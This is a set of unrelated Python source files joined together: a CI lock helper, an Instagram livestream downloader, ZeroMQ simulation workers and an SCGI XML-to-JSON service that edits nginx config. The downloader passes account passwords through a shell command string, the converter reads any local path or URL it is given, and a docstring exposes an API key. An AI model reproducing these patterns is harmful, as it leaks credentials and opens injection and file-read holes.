# Getting all existing files details for integrations that we want to lock
for integration in integrations:
current_integrations_lock_files.update({integration: [lock_file_blob for lock_file_blob in lock_files_ls if
lock_file_blob.name == f'{LOCKS_PATH}/{integration}']})
# Filtering 'current_integrations_lock_files' from integrations with no files
current_integrations_lock_files = {integration: blob_files[0] for integration, blob_files in
current_integrations_lock_files.items() if blob_files}
return current_integrations_lock_files
def lock_expired(lock_file: storage.Blob, lock_timeout: str) -> bool:
"""
Checks if the time that has passed since the last update of the 'lock_file' is more than 'lock_timeout'.
If not, it means that the integration represented by the lock file is currently locked and being tested in another build.
Args:
lock_file: The lock file blob object
lock_timeout: The expiration timeout of the lock in seconds
Returns:
True if the lock has outlived its timeout, else False
"""
return datetime.datetime.now(tz=pytz.utc) - lock_file.updated >= datetime.timedelta(seconds=int(lock_timeout))
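# Illustrative decode of a lock file body (hypothetical values): the blob content
# b'workflow-abc:12345:330' splits into workflow_id='workflow-abc', build_number='12345'
# and lock_timeout='330'; lock_expired() then compares the blob's 'updated' timestamp
# against that timeout while workflow_still_running() checks the workflow itself.
def _example_decode_lock_file(lock_file_content: bytes):
    workflow_id, build_number, lock_timeout = lock_file_content.decode().split(':')
    return workflow_id, build_number, int(lock_timeout)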
def main():
print("Time is: {}\n\n\n".format(datetime.datetime.now()))
tests_settings = options_handler()
# should be removed after solving: https://github.com/demisto/etc/issues/21383
# -------------
if 'master' in tests_settings.serverVersion.lower():
print('[{}] sleeping for 45 secs'.format(datetime.datetime.now()))
sleep(45)
# -------------
manage_tests(tests_settings)
if __name__ == '__main__':
main()
|
dlfuncs.py
|
import os
import shutil
import json
import threading
import time
from xml.dom.minidom import parseString
from instagram_private_api import ClientConnectionError
from instagram_private_api import ClientError
from instagram_private_api import ClientThrottledError
from instagram_private_api_extensions import live
from instagram_private_api_extensions import replay
try:
import logger
import helpers
import pil
import dlfuncs
import assembler
from constants import Constants
from comments import CommentsDownloader
except ImportError:
from . import logger
from . import helpers
from . import pil
from . import assembler
from . import dlfuncs
from .constants import Constants
from .comments import CommentsDownloader
def get_stream_duration(duration_type):
try:
# For some reason the published_time is roughly 40 seconds behind real world time
if duration_type == 0: # Airtime duration
stream_started_mins, stream_started_secs = divmod((int(time.time()) - pil.livestream_obj.get("published_time")), 60)
if duration_type == 1: # Download duration
stream_started_mins, stream_started_secs = divmod((int(time.time()) - int(pil.epochtime)), 60)
if duration_type == 2: # Missing duration
if (int(pil.epochtime) - pil.livestream_obj.get("published_time")) <= 0:
stream_started_mins, stream_started_secs = 0, 0 # Download started 'earlier' than actual broadcast, assume started at the same time instead
else:
stream_started_mins, stream_started_secs = divmod((int(pil.epochtime) - pil.livestream_obj.get("published_time")), 60)
if stream_started_mins < 0:
stream_started_mins = 0
if stream_started_secs < 0:
stream_started_secs = 0
stream_duration_str = '%d minutes' % stream_started_mins
if stream_started_secs:
stream_duration_str += ' and %d seconds' % stream_started_secs
return stream_duration_str
except Exception:
return "Not available"
def get_user_id():
is_user_id = False
user_id = None
try:
user_id = int(pil.dl_user)
is_user_id = True
except ValueError:
try:
user_res = pil.ig_api.username_info(pil.dl_user)
user_id = user_res.get('user', {}).get('pk')
except ClientConnectionError as cce:
logger.error(
"Could not get user info for '{:s}': {:d} {:s}".format(pil.dl_user, cce.code, str(cce)))
if "getaddrinfo failed" in str(cce):
logger.error('Could not resolve host, check your internet connection.')
if "timed out" in str(cce):
logger.error('The connection timed out, check your internet connection.')
except ClientThrottledError as cte:
logger.error(
"Could not get user info for '{:s}': {:d} {:s}".format(pil.dl_user, cte.code, str(cte)))
except ClientError as ce:
logger.error(
"Could not get user info for '{:s}': {:d} {:s}".format(pil.dl_user, ce.code, str(ce)))
if "Not Found" in str(ce):
logger.error('The specified user does not exist.')
except Exception as e:
logger.error("Could not get user info for '{:s}': {:s}".format(pil.dl_user, str(e)))
except KeyboardInterrupt:
logger.binfo("Aborted getting user info for '{:s}', exiting.".format(pil.dl_user))
if user_id and is_user_id:
logger.info("Getting info for '{:s}' successful. Assuming input is an user Id.".format(pil.dl_user))
logger.separator()
return user_id
elif user_id:
logger.info("Getting info for '{:s}' successful.".format(pil.dl_user))
logger.separator()
return user_id
else:
return None
def get_broadcasts_info():
try:
user_id = get_user_id()
if user_id:
broadcasts = pil.ig_api.user_story_feed(user_id)
pil.livestream_obj = broadcasts.get('broadcast')
pil.replays_obj = broadcasts.get('post_live_item', {}).get('broadcasts', [])
return True
else:
return False
except ClientThrottledError:
logger.error('Could not check because you are making too many requests at this time.')
return False
except Exception as e:
logger.error('Could not finish checking: {:s}'.format(str(e)))
if "timed out" in str(e):
logger.error('The connection timed out, check your internet connection.')
if "login_required" in str(e):
logger.error('Login cookie was loaded but user is not actually logged in. Delete the cookie file and try '
'again.')
return False
except KeyboardInterrupt:
logger.binfo('Aborted checking for livestreams and replays, exiting.')
return False
def merge_segments():
try:
if pil.run_at_finish:
try:
thread = threading.Thread(target=helpers.run_command, args=(pil.run_at_finish,))
thread.daemon = True
thread.start()
logger.binfo("Launched finish command: {:s}".format(pil.run_at_finish))
except Exception as e:
logger.warn('Could not execute command: {:s}'.format(str(e)))
live_mp4_file = '{}{}_{}_{}_{}_live.mp4'.format(pil.dl_path, pil.datetime_compat, pil.dl_user,
pil.livestream_obj.get('id'), pil.epochtime)
live_segments_path = os.path.normpath(pil.broadcast_downloader.output_dir)
if pil.segments_json_thread_worker and pil.segments_json_thread_worker.is_alive():
pil.kill_segment_thread = True
pil.segments_json_thread_worker.join()
if pil.comment_thread_worker and pil.comment_thread_worker.is_alive():
logger.info("Waiting for comment downloader to finish.")
pil.comment_thread_worker.join()
try:
if not pil.skip_merge:
logger.info('Merging downloaded files into video.')
pil.broadcast_downloader.stitch(live_mp4_file, cleartempfiles=pil.clear_temp_files)
logger.info('Successfully merged downloaded files into video.')
else:
logger.binfo("Merging of downloaded files has been disabled.")
logger.binfo("Use --assemble command to manually merge downloaded segments.")
if pil.clear_temp_files:
helpers.remove_temp_folder()
helpers.remove_lock()
except ValueError as e:
logger.separator()
logger.error('Could not merge downloaded files: {:s}'.format(str(e)))
if os.listdir(live_segments_path):
logger.separator()
logger.binfo("Segment directory is not empty. Trying to merge again.")
logger.separator()
pil.assemble_arg = live_mp4_file.replace(".mp4", "_downloads.json")
assembler.assemble(user_called=False)
else:
logger.separator()
logger.error("Segment directory is empty. There is nothing to merge.")
logger.separator()
helpers.remove_lock()
except Exception as e:
logger.error('Could not merge downloaded files: {:s}'.format(str(e)))
helpers.remove_lock()
except KeyboardInterrupt:
logger.binfo('Aborted merging process, no video was created.')
helpers.remove_lock()
def download_livestream():
try:
def print_status(sep=True):
if pil.do_heartbeat:
heartbeat_info = pil.ig_api.broadcast_heartbeat_and_viewercount(pil.livestream_obj.get('id'))
viewers = pil.livestream_obj.get('viewer_count', 0) + 1
if sep:
logger.separator()
else:
logger.info('Username : {:s}'.format(pil.dl_user))
logger.info('Viewers : {:s} watching'.format(str(int(viewers))))
logger.info('Airing time : {:s}'.format(get_stream_duration(0)))
if pil.do_heartbeat:
logger.info('Status : {:s}'.format(heartbeat_info.get('broadcast_status').title()))
return heartbeat_info.get('broadcast_status') not in ['active', 'interrupted']
else:
return None
mpd_url = (pil.livestream_obj.get('dash_manifest')
or pil.livestream_obj.get('dash_abr_playback_url')
or pil.livestream_obj.get('dash_playback_url'))
pil.live_folder_path = '{}{}_{}_{}_{}_live_downloads'.format(pil.dl_path, pil.datetime_compat, pil.dl_user,
pil.livestream_obj.get('id'), pil.epochtime)
pil.broadcast_downloader = live.Downloader(
mpd=mpd_url,
output_dir=pil.live_folder_path,
user_agent=pil.ig_api.user_agent,
max_connection_error_retry=3,
duplicate_etag_retry=30,
callback_check=print_status,
mpd_download_timeout=3,
download_timeout=3,
ffmpeg_binary=pil.ffmpeg_path)
except Exception as e:
logger.error('Could not start downloading livestream: {:s}'.format(str(e)))
logger.separator()
helpers.remove_lock()
try:
broadcast_owner = pil.livestream_obj.get('broadcast_owner', {}).get('username')
try:
broadcast_guest = pil.livestream_obj.get('cobroadcasters', {})[0].get('username')
except Exception:
broadcast_guest = None
if broadcast_owner != pil.dl_user:
logger.binfo('This livestream is a dual-live, the owner is "{}".'.format(broadcast_owner))
broadcast_guest = None
if broadcast_guest:
logger.binfo('This livestream is a dual-live, the current guest is "{}".'.format(broadcast_guest))
pil.has_guest = broadcast_guest
logger.separator()
print_status(False)
logger.separator()
helpers.create_lock_folder()
pil.segments_json_thread_worker = threading.Thread(target=helpers.generate_json_segments)
pil.segments_json_thread_worker.start()
logger.info('Downloading livestream, press [CTRL+C] to abort.')
if pil.run_at_start:
try:
thread = threading.Thread(target=helpers.run_command, args=(pil.run_at_start,))
thread.daemon = True
thread.start()
logger.binfo("Launched start command: {:s}".format(pil.run_at_start))
except Exception as e:
logger.warn('Could not launch command: {:s}'.format(str(e)))
if pil.dl_comments:
try:
comments_json_file = '{}{}_{}_{}_{}_live_comments.json'.format(
pil.dl_path, pil.datetime_compat, pil.dl_user, pil.livestream_obj.get('id'), pil.epochtime)
pil.comment_thread_worker = threading.Thread(target=get_live_comments, args=(comments_json_file,))
pil.comment_thread_worker.start()
except Exception as e:
logger.error('An error occurred while downloading comments: {:s}'.format(str(e)))
pil.broadcast_downloader.run()
logger.separator()
logger.info("The livestream has been ended by the user.")
logger.separator()
logger.info('Airtime duration : {}'.format(get_stream_duration(0)))
logger.info('Download duration : {}'.format(get_stream_duration(1)))
logger.info('Missing (approx.) : {}'.format(get_stream_duration(2)))
logger.separator()
merge_segments()
except KeyboardInterrupt:
logger.separator()
logger.binfo('The download has been aborted.')
logger.separator()
logger.info('Airtime duration : {}'.format(get_stream_duration(0)))
logger.info('Download duration : {}'.format(get_stream_duration(1)))
logger.info('Missing (approx.) : {}'.format(get_stream_duration(2)))
logger.separator()
if not pil.broadcast_downloader.is_aborted:
pil.broadcast_downloader.stop()
merge_segments()
def download_replays():
try:
try:
logger.info('Amount of replays : {:s}'.format(str(len(pil.replays_obj))))
for replay_index, replay_obj in enumerate(pil.replays_obj):
bc_dash_manifest = parseString(replay_obj.get('dash_manifest')).getElementsByTagName('Period')
bc_duration_raw = bc_dash_manifest[0].getAttribute("duration")
bc_minutes = (bc_duration_raw.split("H"))[1].split("M")[0]
bc_seconds = ((bc_duration_raw.split("M"))[1].split("S")[0]).split('.')[0]
logger.info(
'Replay {:s} duration : {:s} minutes and {:s} seconds'.format(str(replay_index + 1), bc_minutes,
bc_seconds))
except Exception as e:
logger.warn("An error occurred while getting replay duration information: {:s}".format(str(e)))
logger.separator()
logger.info("Downloading replays, press [CTRL+C] to abort.")
logger.separator()
for replay_index, replay_obj in enumerate(pil.replays_obj):
exists = False
pil.livestream_obj = replay_obj
dl_path_files = os.listdir(pil.dl_path)
for dl_path_file in dl_path_files:
if (str(replay_obj.get('id')) in dl_path_file) and ("_replay" in dl_path_file) and (dl_path_file.endswith(".mp4")):
logger.binfo("Already downloaded replay {:d} with ID '{:s}'.".format(replay_index + 1, str(replay_obj.get('id'))))
exists = True
if not exists:
current = replay_index + 1
logger.info(
"Downloading replay {:s} of {:s} with ID '{:s}'.".format(str(current), str(len(pil.replays_obj)),
str(replay_obj.get('id'))))
pil.live_folder_path = '{}{}_{}_{}_{}_replay_downloads'.format(
pil.dl_path, pil.datetime_compat, pil.dl_user, pil.livestream_obj.get('id'), replay_obj.get("published_time"))
broadcast_downloader = replay.Downloader(
mpd=replay_obj.get('dash_manifest'),
output_dir=pil.live_folder_path,
user_agent=pil.ig_api.user_agent,
ffmpeg_binary=pil.ffmpeg_path)
if pil.use_locks:
helpers.create_lock_folder()
replay_mp4_file = '{}{}_{}_{}_{}_replay.mp4'.format(
pil.dl_path, pil.datetime_compat, pil.dl_user, pil.livestream_obj.get('id'), replay_obj.get("published_time"))
comments_json_file = '{}{}_{}_{}_{}_replay_comments.json'.format(
pil.dl_path, pil.datetime_compat, pil.dl_user, pil.livestream_obj.get('id'), replay_obj.get("published_time"))
pil.comment_thread_worker = threading.Thread(target=get_replay_comments, args=(comments_json_file,))
broadcast_downloader.download(replay_mp4_file, cleartempfiles=pil.clear_temp_files)
if pil.clear_temp_files:
helpers.remove_temp_folder()
if pil.dl_comments:
logger.info("Downloading replay comments.")
try:
get_replay_comments(comments_json_file)
except Exception as e:
logger.error('An error occurred while downloading comments: {:s}'.format(str(e)))
logger.info("Finished downloading replay {:s} of {:s}.".format(str(current), str(len(pil.replays_obj))))
helpers.remove_lock()
if current != len(pil.replays_obj):
logger.separator()
logger.separator()
logger.info("Finished downloading all available replays.")
helpers.remove_lock()
except Exception as e:
logger.error('Could not save replay: {:s}'.format(str(e)))
helpers.remove_lock()
except KeyboardInterrupt:
logger.separator()
logger.binfo('The download has been aborted by the user, exiting.')
helpers.remove_temp_folder()
helpers.remove_lock()
def download_following():
try:
is_checking = ''
if pil.dl_lives and pil.dl_replays:
is_checking = 'livestreams or replays'
elif pil.dl_lives and not pil.dl_replays:
is_checking = 'livestreams'
elif not pil.dl_lives and pil.dl_replays:
is_checking = 'replays'
logger.info("Checking following users for any {:s}.".format(is_checking))
broadcast_f_list = pil.ig_api.reels_tray()
usernames_available_livestreams = []
usernames_available_replays = []
if broadcast_f_list['broadcasts'] and pil.dl_lives:
for broadcast_f in broadcast_f_list['broadcasts']:
username = broadcast_f['broadcast_owner']['username']
if username not in usernames_available_livestreams:
usernames_available_livestreams.append(username)
if broadcast_f_list.get('post_live', {}).get('post_live_items', []) and pil.dl_replays:
for broadcast_r in broadcast_f_list.get('post_live', {}).get('post_live_items', []):
for broadcast_f in broadcast_r.get("broadcasts", []):
username = broadcast_f['broadcast_owner']['username']
if username not in usernames_available_replays:
usernames_available_replays.append(username)
logger.separator()
available_total = list(usernames_available_livestreams)
available_total.extend(x for x in usernames_available_replays if x not in available_total)
if available_total:
logger.info("The following users have available {:s}.".format(is_checking))
logger.info(', '.join(available_total))
logger.separator()
iterate_users(available_total)
else:
logger.info("There are currently no available {:s}.".format(is_checking))
logger.separator()
except Exception as e:
logger.error("Could not finish checking following users: {:s}".format(str(e)))
except KeyboardInterrupt:
logger.separator()
logger.binfo('The checking process has been aborted by the user.')
logger.separator()
def iterate_users(user_list):
for user in user_list:
try:
if os.path.isfile(os.path.join(pil.dl_path, user + '.lock')):
logger.warn("Lock file is already present for '{:s}', there is probably another download "
"ongoing!".format(user))
logger.warn(
"If this is not the case, manually delete the file '{:s}' and try again.".format(user + '.lock'))
else:
logger.info("Launching daemon process for '{:s}'.".format(user))
start_result = helpers.run_command("{:s} -d {:s} -cp '{:s}' -dp '{:s}' {:s} {:s} {:s} {:s}".format(
("'" + pil.winbuild_path + "'") if pil.winbuild_path else "pyinstalive",
user,
pil.config_path,
pil.dl_path,
'--no-lives' if not pil.dl_lives else '',
'--no-replays' if not pil.dl_replays else '',
'--no-heartbeat' if not pil.do_heartbeat else '',
'--username {:s} --password {:s}'.format(pil.ig_user, pil.ig_pass) if pil.config_login_overridden else ''))
if start_result:
logger.warn("Could not start process: {:s}".format(str(start_result)))
else:
logger.info("Process started successfully.")
logger.separator()
time.sleep(2)
except Exception as e:
logger.warn("Could not start process: {:s}".format(str(e)))
except KeyboardInterrupt:
logger.binfo('The process launching has been aborted by the user.')
logger.separator()
break
def get_live_comments(comments_json_file):
try:
comments_downloader = CommentsDownloader(destination_file=comments_json_file)
first_comment_created_at = 0
try:
while not pil.broadcast_downloader.is_aborted:
if 'initial_buffered_duration' not in pil.livestream_obj and pil.broadcast_downloader.initial_buffered_duration:
pil.livestream_obj['initial_buffered_duration'] = pil.broadcast_downloader.initial_buffered_duration
comments_downloader.broadcast = pil.livestream_obj
first_comment_created_at = comments_downloader.get_live(first_comment_created_at)
except ClientError as e:
if 'media has been deleted' not in e.error_response:
logger.warn("Comment collection ClientError: %d %s" % (e.code, e.error_response))
try:
if comments_downloader.comments:
comments_downloader.save()
comments_log_file = comments_json_file.replace('.json', '.log')
comment_errors, total_comments = CommentsDownloader.generate_log(
comments_downloader.comments, pil.epochtime, comments_log_file,
comments_delay=pil.broadcast_downloader.initial_buffered_duration)
if len(comments_downloader.comments) == 1:
logger.info("Successfully saved 1 comment.")
#os.remove(comments_json_file)
logger.separator()
return True
else:
if comment_errors:
logger.warn(
"Successfully saved {:s} comments but {:s} comments are (partially) missing.".format(
str(total_comments), str(comment_errors)))
else:
logger.info("Successfully saved {:s} comments.".format(str(total_comments)))
#os.remove(comments_json_file)
logger.separator()
return True
else:
logger.info("There are no available comments to save.")
logger.separator()
return False
except Exception as e:
logger.error('Could not save comments: {:s}'.format(str(e)))
return False
except KeyboardInterrupt as e:
logger.binfo("Downloading livestream comments has been aborted.")
return False
def get_replay_comments(comments_json_file):
try:
comments_downloader = CommentsDownloader(destination_file=comments_json_file)
comments_downloader.get_replay()
try:
if comments_downloader.comments:
comments_log_file = comments_json_file.replace('.json', '.log')
comment_errors, total_comments = CommentsDownloader.generate_log(
comments_downloader.comments, pil.livestream_obj.get('published_time'), comments_log_file,
comments_delay=0)
if total_comments == 1:
logger.info("Successfully saved 1 comment to logfile.")
#os.remove(comments_json_file)
logger.separator()
return True
else:
if comment_errors:
logger.warn(
"Successfully saved {:s} comments but {:s} comments are (partially) missing.".format(
str(total_comments), str(comment_errors)))
else:
logger.info("Successfully saved {:s} comments.".format(str(total_comments)))
#os.remove(comments_json_file)
logger.separator()
return True
else:
logger.info("There are no available comments to save.")
return False
except Exception as e:
logger.error('Could not save comments to logfile: {:s}'.format(str(e)))
return False
except KeyboardInterrupt as e:
logger.binfo("Downloading replay comments has been aborted.")
return False
|
box_pushing_workers.py
|
import multiprocessing
import time
from qsim.simulator import QuasistaticSimParameters
from qsim.system import cpp_params_from_py_params
try:
from irs_lqr.quasistatic_dynamics import *
from zmq_parallel_cmp.array_io import *
except ImportError:
from irs_lqr.irs_lqr.quasistatic_dynamics import *
from irs_lqr.zmq_parallel_cmp.array_io import *
# TODO: make workers system-agnostic. Maybe pass in a yml file describing
# the system from the command line?
from box_pushing_setup import *
def f_worker(lock: multiprocessing.Lock):
context = zmq.Context()
# Socket to receive messages on
receiver = context.socket(zmq.PULL)
receiver.connect("tcp://localhost:5557")
# Socket to send messages to
sender = context.socket(zmq.PUSH)
sender.connect("tcp://localhost:5558")
pid = multiprocessing.current_process().pid
print("worker", pid, "ready.")
sim_params = QuasistaticSimParameters(
gravity=gravity,
nd_per_contact=2,
contact_detection_tolerance=contact_detection_tolerance,
is_quasi_dynamic=True)
q_sim_py = QuasistaticSimulator(
model_directive_path=model_directive_path,
robot_stiffness_dict=robot_stiffness_dict,
object_sdf_paths=object_sdf_dict,
sim_params=sim_params,
internal_vis=False)
sim_params_cpp = cpp_params_from_py_params(sim_params)
sim_params_cpp.gradient_lstsq_tolerance = gradient_lstsq_tolerance
q_sim_cpp = QuasistaticSimulatorCpp(
model_directive_path=model_directive_path,
robot_stiffness_str=robot_stiffness_dict,
object_sdf_paths=object_sdf_dict,
sim_params=sim_params_cpp)
q_dynamics = QuasistaticDynamics(h=h, q_sim_py=q_sim_py, q_sim=q_sim_cpp)
# Process tasks forever
i_tasks = 0
while True:
x_u_nominal, t_list, n_samples, std = recv_array(receiver)
assert len(x_u_nominal.shape) == 2
x_nominals = x_u_nominal[:, :q_dynamics.dim_x]
u_nominals = x_u_nominal[:, q_dynamics.dim_x:]
ABhat = q_dynamics.calc_AB_batch(
x_nominals=x_nominals,
u_nominals=u_nominals,
n_samples=n_samples,
std_u=std,
mode=gradient_mode)
# Send results to sink
send_array(sender, A=ABhat, t=t_list, n_samples=-1, std=[-1])
i_tasks += 1
if i_tasks % 10 == 0:
lock.acquire()
print(pid, "has processed", i_tasks, "tasks.")
lock.release()
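# Sketch of the matching dispatcher/sink side of this PUSH/PULL pipeline (illustrative
# only; the real dispatcher lives elsewhere in the project, and the bind addresses are
# assumptions mirroring the worker's connect() calls above).
def _example_dispatch(x_u_nominal, t_list, n_samples, std):
    context = zmq.Context()
    task_sender = context.socket(zmq.PUSH)       # workers PULL tasks from :5557
    task_sender.bind("tcp://*:5557")
    result_receiver = context.socket(zmq.PULL)   # workers PUSH results to :5558
    result_receiver.bind("tcp://*:5558")
    send_array(task_sender, A=x_u_nominal, t=t_list, n_samples=n_samples, std=std)
    return recv_array(result_receiver)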
if __name__ == "__main__":
p_list = []
try:
lock = multiprocessing.Lock()
for _ in range(28):
p = multiprocessing.Process(target=f_worker, args=(lock,))
p_list.append(p)
p.start()
time.sleep(100000)
except KeyboardInterrupt:
for p in p_list:
p.terminate()
p.join()
|
__main__.py
|
# coding: utf-8
__appname__ = "xmltojson"
__version__ = "17.191.1220" #добавлена обработка POST запроса
#__version__ = "17.181.1520" #первая редакция
__profile__ = ""
__index__ =-1
import sys
sys.PY3 = sys.version_info[0] > 2
if not sys.PY3:
input = raw_input
import os, time
import traceback
import socket
__hostname__ = socket.gethostname().lower()
import threading, random, subprocess
if sys.PY3:
from urllib.parse import unquote
else:
from urllib import unquote
import uuid
import glob
import gzip
import shutil
import hashlib
from lockfile import LockWait
APPCONF = {
"params": [],
"kwargs": {},
#"hostname": socket.gethostname().lower(),
"addr": ("127.0.0.1", 0),
"nginx": {
"location": "/ms71/conf/location",
"upstream": "/ms71/conf/upstream",
},
}
def main():
rc = 0
try:
APPCONF["params"], APPCONF["kwargs"] = handle_commandline()
APPCONF["addr"] = APPCONF["kwargs"].pop("addr", APPCONF["addr"])
serve_forever(APPCONF["addr"], application, init)
except KeyboardInterrupt as e:
pass
except SystemExit as e:
if e:
rc = e.code
except:
log(traceback.format_exc(), kind="error")
finally:
try:
finit()
except:
log(traceback.format_exc(), kind="error:finit")
os._exit(rc)
def application(env):
"""
CONTENT_ENCODING = <class 'str'> gzip
CONTENT_LENGTH = <class 'int'> 5421
CONTENT_TYPE = <class 'str'> application/json
HTTP_KWARGS = <class 'dict'> {}
HTTP_METHOD = <class 'str'> POST
HTTP_PARAMS = <class 'list'> []
REMOTE_ADDR = <class 'str'> 79.104.1.86
REMOTE_PORT = <class 'str'> 65083
ROOT = <class 'str'> /usr/share/nginx/html
SCGI = <class 'str'> 1
SERVER_NAME = <class 'str'> online365.pro
SERVER_PORT = <class 'str'> 443
URI = <class 'str'> /sgg/
X-API-KEY = <class 'str'> 80a3fd3ba997493f837894f1af803216
X-BODY-FILE = <class 'str'> /usr/share/nginx/temp/0000000005
scgi.defer = <class 'NoneType'> None
scgi.initv = <class 'list'> [('127.0.0.1', 50703), 6113]
scgi.rfile = <class '_io.BufferedReader'> <_io.BufferedReader name=5>
scgi.wfile = <class 'socket.SocketIO'> <socket.SocketIO object at 0x7f90edc44240>
"""
from lib.xmltojson import main as main2
import itertools
import zlib
addr, pid = env["scgi.initv"][:2]
msg = f'{addr[0]} {addr[1]} {env["HTTP_METHOD"]} {env["URI"]} {env["HTTP_PARAMS"]} {env["HTTP_KWARGS"]}'
env["scgi.defer"] = lambda: log("%s close" % msg)
log(msg)
# also allow passing the string to convert in the body of a POST request
content = u"""Манускрипт.Онлайн
Сервис XMLtoJSON преобразует XML документ в JSON
Пример использования (метод GET):
http://online365.pro/xmltojson?/ms71/data/filename.xml - локальный файл
http://online365.pro/xmltojson?http://www.hostname.org/qqwtrtr7646gfyjy.xml - url файла
Пример использования (метод POST):
http://online365.pro/xmltojson
в теле запроса - xml строка
методо сжатия deflate
возвращает сроку JSON
""".encode()
fg_head = True
data = None
_rm = env["HTTP_METHOD"].upper()
arg=None
if 'GET' == _rm:
_qs = env["HTTP_PARAMS"]
g = (v.strip() for v in itertools.chain.from_iterable(item.split(',') for item in _qs))
args = list(filter(lambda x: x, g))
try:
arg = args.pop(0)
except Exception as Err:
#print(Err)
pass
elif 'POST' == _rm:
arg = env['scgi.rfile'].read(env['CONTENT_LENGTH'])
try:
arg = zlib.decompress(arg)
except Exception as Err:
#log(Err)
pass
if arg:
fg_head = False
data = main2(arg)
header = head(len(content), False, True)
if not fg_head:
if data:
content = data.encode()
header = head(len(content), True, False)
else:
content = u"something wrong".encode()
header = head(len(content), False, True)
# three mandatory yields: status, headers, body
yield '200 OK'
yield header
yield content
def head(aContentLength, fgDeflate=True, fg_head=False):
aLastModified = time.strftime('%a, %d %b %Y %X GMT', time.gmtime())
r = []
r.append(("Last-Modified", "%s" % aLastModified))
r.append(("Content-Length", "%i" % aContentLength))
r.append(("X-Accel-Buffering", "no"))
if fg_head:
r.append(("Cache-Control", "no-cache"))
r.append(("Content-Type", "text/plain; charset=UTF-8"))
else:
r.append(("Content-Disposition", "attachment; filename=document.json"))
r.append(("Content-Type", "application/octet-stream"))
if fgDeflate:
r.append(("Content-Encoding", "deflate"))
return r
def init(sock):
addr = sock.getsockname()[:2]
sock.listen(100)
APPCONF["addr"] = addr
fileupstream = _getfilename("upstream")
APPCONF["fileupstream"] = fileupstream
data = """location /xmltojson {
limit_except GET POST{
deny all;
}
include scgi_params;
scgi_param X-BODY-FILE $request_body_file;
scgi_param X-API-KEY $http_x_api_key;
scgi_pass xmltojson_scgi;
scgi_buffering off;
scgi_cache off;
}
"""
filelocation = _getfilename("location")
dn = os.path.dirname(filelocation)
bs = os.path.basename(filelocation)
_filelocation = os.path.join(dn, bs.split('.', 1)[0].split('-', 1)[0]) # shared file for all application instances
with open(_filelocation, "wb") as f:
f.write(data.encode())
APPCONF["filelocation"] = _filelocation
dn = os.path.dirname(fileupstream)
bs = os.path.basename(fileupstream)
_fileupstream = os.path.join(dn, bs.split('.', 1)[0].split('-', 1)[0]) # shared file for all application instances
_fileupstreamlock = bs.split('.', 1)[0].split('-', 1)[0] # _fileupstream + '.lock'
data1 = """upstream xmltojson_scgi { least_conn;
server %s:%s; # %s
}
""" % (addr[0], addr[1], bs)
data2 = """# server %s:%s; # %s""" % (addr[0], addr[1], bs)
with LockWait(_fileupstreamlock):
if os.path.exists(_fileupstream):
with open(_fileupstream, "rb") as f:
src = f.read().decode().rstrip().splitlines()
# + ' ' + data[1:] + '\n}\n'
_find = "# %s" % bs
# fg - assume we need to add our own upstream entry
fg = True
for i in range(1, len(src)-1):
if src[i].find(_find) >-1:
fg = False
src[i] = ' ' + data2[1:]
break
if fg:
src[len(src)-1] = ' ' + data2[1:] + '\n}\n'
src = '\n'.join(src)
with open(_fileupstream, "wb") as f:
f.write(src.encode())
else:
with open(_fileupstream, "wb") as f:
f.write(data1.encode())
rc = 0
rc = subprocess.call(['sudo', 'nginx', '-t', '-c', '/ms71/saas.conf', '-p', '/ms71/'])
if 0 == rc:
rc = subprocess.call(['sudo', 'nginx', '-s', 'reload', '-c', '/ms71/saas.conf', '-p', '/ms71/'])
if 0 == rc:
log("%s:%s running" % addr)
return [addr, os.getpid()]
raise SystemExit(rc)
def _getfilename(name):
filename = ""
if __index__ > -1:
if __profile__:
filename = os.path.join(APPCONF["nginx"][name], "%s-%s.%s" % (__appname__, __index__, __profile__))
else:
filename = os.path.join(APPCONF["nginx"][name], "%s-%s" % (__appname__, __index__))
else:
if __profile__:
filename = os.path.join(APPCONF["nginx"][name], "%s.%s" % (__appname__, __profile__))
else:
filename = os.path.join(APPCONF["nginx"][name], __appname__)
return filename
def finit():
fileupstream = APPCONF.get("fileupstream")
if fileupstream is None:
log("%s:%s critical" % APPCONF["addr"], begin='')
return
try:
os.remove(fileupstream)
except: pass
dn = os.path.dirname(fileupstream)
bs = os.path.basename(fileupstream)
_fileupstream = os.path.join(dn, bs.split('.', 1)[0].split('-', 1)[0])
_fileupstreamlock = bs.split('.', 1)[0].split('-', 1)[0] # _fileupstream + '.lock'
with LockWait(_fileupstreamlock):
_find = "# %s" % bs
src = ""
fg_noapp = True
if os.path.exists(_fileupstream):
with open(_fileupstream, "rb") as f:
src = f.read().decode().rstrip().splitlines()
for i in range(1, len(src)-1):
if src[i].find(_find) >-1:
src.pop(i)
break
fg_noapp = 0 == len(src[1:-1])
if fg_noapp: # no running application instances - remove the shared location and upstream files
try:
os.remove(APPCONF["filelocation"])
except: pass
try:
os.remove(_fileupstream)
except: pass
else:
src = '\n'.join(src)
with open(_fileupstream, "wb") as f:
f.write(src.encode())
subprocess.call(['sudo', 'nginx', '-s', 'reload', '-c', '/ms71/saas.conf', '-p', '/ms71/'])
log("%s:%s shutdown" % APPCONF["addr"], begin='')
def serve_forever(addr, handle_request, init=None):
sock = None
if type(addr) is str:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(addr)
#sock.listen(10)
initial_value = None
if init:
if callable(init):
initial_value = init(sock)
else:
initial_value = init
try:
while True:
_conn, _addr = sock.accept()
_t = threading.Thread(target=_handle_conn, args=(_conn, _addr, handle_request, initial_value))
_t.env = None
_t.daemon = True
_t.start()
finally:
try: sock.close()
except: pass
def _handle_conn(conn, addr, handle_request, initial_value):
env = None
try:
conn.settimeout(1)
rfile = conn.makefile("rb", -1)
wfile = conn.makefile("wb", 0)
env = _env_read(rfile)
env = _args_parse(env)
#env["scgi.connection"] = conn
#env["scgi.address"] = addr
env["scgi.defer"] = None
env["scgi.initv"] = initial_value
env["scgi.rfile"] = rfile
env["scgi.wfile"] = wfile
env["CONTENT_LENGTH"] = int(env["CONTENT_LENGTH"])
threading.current_thread().env = env
g = handle_request(env)
wfile.write("Status: {0}\r\n".format(g.__next__()).encode())
wfile.flush()
for kv in g.__next__():
wfile.write(": ".join(kv).encode())
wfile.write(b"\r\n")
wfile.write(b"\r\n")
wfile.flush()
for data in g:
wfile.write(data)
wfile.flush()
except (BrokenPipeError) as e:
pass
except:
print(conn, file=sys.stderr)
print(env, file=sys.stderr)
traceback.print_exc()
finally:
if not wfile.closed:
try: wfile.flush()
except: pass
